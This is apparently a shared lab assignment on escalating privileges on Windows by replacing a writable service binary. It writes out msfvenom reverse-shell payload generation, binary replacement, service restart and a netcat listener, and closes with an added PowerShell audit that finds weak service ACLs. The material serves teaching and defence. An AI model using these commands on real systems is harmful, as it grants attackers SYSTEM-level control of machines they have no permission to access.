Windows LPE Practical Assignment

The document outlines a practical assignment focused on exploiting improper Access Control Lists (ACLs) on Windows systems to achieve local elevation of privilege using Kali Linux tools. It details a step-by-step procedure including information gathering, identifying writable service binaries, modifying service binaries, restarting services, and confirming privilege escalation. The assignment emphasizes the importance of conducting such activities in a controlled environment and adhering to legal and ethical standards.

Uploaded by aryangupta080704

Practical Assignment

Topic: Exploiting the Windows Access Control Model for Local Elevation of
Privilege

Objective:
To understand and demonstrate how improper Access Control Lists (ACLs) on Windows
systems can be exploited to gain elevated privileges using practical tools available in Kali
Linux.

Requirements:

- A Windows virtual machine (target)
- Kali Linux virtual machine (attacker)
- Meterpreter or nc for reverse shell
- Exploitable Windows service or weak ACL configuration
- Windows user account with limited privileges

Step-by-Step Procedure:

Step 1: Information Gathering

- Start with a reverse shell to the Windows machine (assume you already have a
low-privileged session).
- Use Meterpreter:
    meterpreter > getuid
    meterpreter > sysinfo

Step 2: Check for Writable Service Binaries

Use the built-in sc command or accesschk (Sysinternals) to identify services with weak
permissions:
    > sc qc [ServiceName]
    > accesschk.exe -uwcqv "username" * /accepteula

Step 3: Modify the Service Binary

If you find a service binary path that is writable, replace it with your malicious payload:
    $ msfvenom -p windows/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe -o revshell.exe
    $ cp revshell.exe "\\target\c$\Program Files\VulnerableService\vulnsvc.exe"

Step 4: Restart the Service

Restart the service to trigger the payload:
    > net stop [ServiceName]
    > net start [ServiceName]

Step 5: Catch the Shell

On Kali, listen using Netcat or Metasploit:
    $ nc -lvnp 4444

Step 6: Privilege Escalation Confirmed

Check privileges:
    > whoami
    > net session
(net session should return output only if SYSTEM/admin)

Security Precautions:

- This activity should only be conducted in an isolated lab environment.
- Never perform privilege escalation on production systems without permission.
- Always use legal and ethical practices.

Conclusion:

Improper file or folder permissions on Windows services can lead to serious privilege
escalation risks. This practical demonstrated how to exploit such misconfigurations using
Kali Linux tools.
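The misconfiguration described in this assignment can be found from the defender's side before anyone exploits it. The following PowerShell audit is an added example, not part of the original assignment: it lists every service whose binary or containing folder grants write-type rights to a broad group. The list of SIDs and the rights mask are choices made for this example.

```powershell
# Added example (defensive audit). Run from an elevated PowerShell prompt.
# Well-known SIDs of broad, low-privileged groups (selection is this example's choice).
$broadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# Rights that let a principal replace the file, plant files in the folder, or
# rewrite the ACL; 0x50000000 adds the raw GENERIC_ALL and GENERIC_WRITE bits.
$names     = 'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$writeMask = [int][System.Security.AccessControl.FileSystemRights]$names -bor 0x50000000

function Get-ServiceBinaryPath([string]$PathName) {
    # The service path is either quoted, or unquoted and followed by arguments.
    if ($PathName -match '^\s*"([^"]+)"')        { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }
}

function Get-WeakAce([string]$Path) {
    $sidType = [System.Security.Principal.SecurityIdentifier]
    $inheritOnlyFlag = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        # Inherit-only entries apply to children, not to the object being checked.
        if ($ace.PropagationFlags.HasFlag($inheritOnlyFlag)) { continue }
        if ($ace.AccessControlType -eq 'Allow' -and $broadSids.ContainsKey($sid) -and
            (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) {
            [pscustomobject]@{
                Path = $Path; Principal = $broadSids[$sid]; Rights = $ace.FileSystemRights
            }
        }
    }
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not $bin) { continue }
    $bin = [Environment]::ExpandEnvironmentVariables($bin)
    # Check the binary and its folder: a writable folder also allows replacement.
    foreach ($target in @($bin, [System.IO.Path]::GetDirectoryName($bin))) {
        if ($target -and (Test-Path -LiteralPath $target)) {
            Get-WeakAce $target | Select-Object @{n = 'Service'; e = { $svc.Name }}, *
        }
    }
}
$findings | Sort-Object Service, Path | Format-Table -AutoSize
```

Each row is a service whose binary or folder can be modified by a non-administrative principal. The fix is to remove that grant so that only administrative accounts hold write access to the path.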
